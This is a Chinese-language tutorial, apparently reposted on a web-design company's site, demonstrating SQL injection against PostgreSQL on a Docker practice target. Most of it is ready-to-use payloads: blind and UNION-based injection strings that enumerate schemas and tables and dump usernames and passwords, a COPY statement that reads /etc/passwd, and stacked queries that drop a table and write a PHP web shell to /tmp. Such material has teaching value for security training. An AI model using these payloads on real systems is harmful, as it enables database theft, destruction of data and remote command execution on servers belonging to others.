小編給大家分享一下postgresql注入的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
成都創(chuàng)新互聯(lián)服務熱線:028-86922220,為您提供成都網(wǎng)站建設網(wǎng)頁設計及定制高端網(wǎng)站建設服務,成都創(chuàng)新互聯(lián)網(wǎng)頁制作領域10余年,包括成都PVC花箱等多個領域擁有多年設計經(jīng)驗,選擇成都創(chuàng)新互聯(lián),為企業(yè)錦上添花!
PostgreSQL 是一個免費的對象-關系數(shù)據(jù)庫服務器 (ORDBMS),在靈活的 BSD 許可證下發(fā)行。
PostgreSQL 開發(fā)者把它念作 post-gress-Q-L。
PostgreSQL 的 Slogan 是 "世界上最先進的開源關系型數(shù)據(jù)庫"。
這里我們通過一個簡單的靶場來學習 postgresql 數(shù)據(jù)庫相關漏洞
這里我們是利用 docker 搭建的環(huán)境
訪問我們搭建的地址:http://172.16.1.238:90/index.php?uid=1
基于布爾型注入(boolean-based blind)
index.php?uid=1 AND 1=1 運行正常
index.php?uid=1 AND 1=2 運行異常
獲取版本號:
select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)
獲取 Schemas 名稱
select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)
AND 6489=(SELECT 6489 FROM PG_SLEEP(5)) 延時 5 秒
?uid=1;select PG_SLEEP(5)--
?uid=1 order by 1,2,3 運行正常
?uid=1 order by 1,2,3,4 運行異常,獲取字段數(shù) 3
?uid=1 UNION ALL SELECT NULL,('11111'),NULL-- 查看是否輸出 11111
獲取數(shù)據(jù)庫結(jié)構(gòu)和內(nèi)容
此處均為聯(lián)合查詢
獲取模式名稱(schemaname)名稱
?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--
語法解析:
COALESCE(expression[,n]) coalesce 函數(shù)返回參數(shù)(列名)中第一個非 NULL 值的字段值,注意不是為空''
cast ('1' as numeric) 1 轉(zhuǎn)換為數(shù)字類型
簡化:
?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--
用戶創(chuàng)建的數(shù)據(jù)庫默認模式名稱(schemaname)為 public
獲取數(shù)據(jù)表名稱
uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')
獲取表字段名稱
?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'—
獲取表內(nèi)容
?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--
PostgreSQL 中部分內(nèi)置函數(shù)、表
?uid=1 union select NULL,NULL,pg_ls_dir('./')
?uid=1; CREATE TABLE passwd(t TEXT); COPY passwd FROM '/etc/passwd'; SELECT NULL,t,NULL FROM passwd;
?uid=1; DROP TABLE pass;(這里需要為數(shù)據(jù)庫存在的表) CREATE TABLE hacktb (t TEXT); INSERT INTO hacktb(t) VALUES ('<?php @system("$_GET[cmd]");?>'); COPY hacktb(t) TO '/tmp/hack.php';
以上是“postgresql注入的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學習更多知識,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
當前名稱:postgresql注入的示例分析
URL分享:http://www.muchs.cn/article36/ihejpg.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供手機網(wǎng)站建設、微信小程序、網(wǎng)站維護、網(wǎng)站策劃、靜態(tài)網(wǎng)站、做網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)